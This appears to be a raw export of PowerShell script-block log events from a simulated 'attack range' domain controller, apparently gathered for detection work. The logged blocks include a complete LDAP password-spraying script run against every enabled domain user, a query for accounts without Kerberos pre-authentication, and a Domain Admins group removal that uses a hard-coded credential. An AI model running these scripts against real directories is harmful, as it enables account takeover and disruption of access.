4104152150x0108574Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name1273b558-b742-4d8f-885a-0f98eb24d197 4104152150x0108560Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name e973c7e7-2850-4908-bd49-6eb1069051a2 4104132150x0108402Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) { Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" exit 1 } $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389) $DomainUsers | Foreach-Object { $user = $_ $password = 'P@ssw0rd!' $credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain") $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM) try { Write-Host " [-] Attempting ${password} on account ${user}." $conn.bind() # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success Write-Host " [!] ${user}:${password} are valid credentials!" } catch { Write-Host $_.Exception.Message } } Write-Host "End of password spraying"}d83e6dcb-1759-4496-8c12-aa5b75634bc1 4104132150x0108400Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) { Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" exit 1 } $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389) $DomainUsers | Foreach-Object { $user = $_ $password = 'P@ssw0rd!' $credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain") $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM) try { Write-Host " [-] Attempting ${password} on account ${user}." $conn.bind() # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success Write-Host " [!] ${user}:${password} are valid credentials!" } catch { Write-Host $_.Exception.Message } } Write-Host "End of password spraying"}4e535179-eaee-454b-b9f6-2d671855577c 4104152150x0106969Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}}5e78d561-dd73-454e-b911-f751b5e641ae 4104152150x0106967Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}}5d5adf00-3b7e-46f2-8309-4e218c417bdc 4104152150x0105979Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$PWord = ConvertTo-SecureString -String password -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\super_user, $PWord if((Get-ADUser remove_user -Properties memberof).memberof -like "CN=Domain Admins*"){ Remove-ADGroupMember -Identity "Domain Admins" -Members remove_user -Credential $Credential -Confirm:$False } else{ write-host "Error - Make sure remove_user is in the domain admins group" -foregroundcolor Red }}4801f4b9-5f12-451d-994f-34c92379dd2e 4104152150x0105977Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$PWord = ConvertTo-SecureString -String password -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\super_user, $PWord if((Get-ADUser remove_user -Properties memberof).memberof -like "CN=Domain Admins*"){ Remove-ADGroupMember -Identity "Domain Admins" -Members remove_user -Credential $Credential -Confirm:$False } else{ write-host "Error - Make sure remove_user is in the domain admins group" -foregroundcolor Red }}d4efbca1-6f2e-4b50-a5a9-308cc98b41ca 4104152150x0105633Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11get-aduser3f5fa968-847e-4de9-80f8-8f10d6030491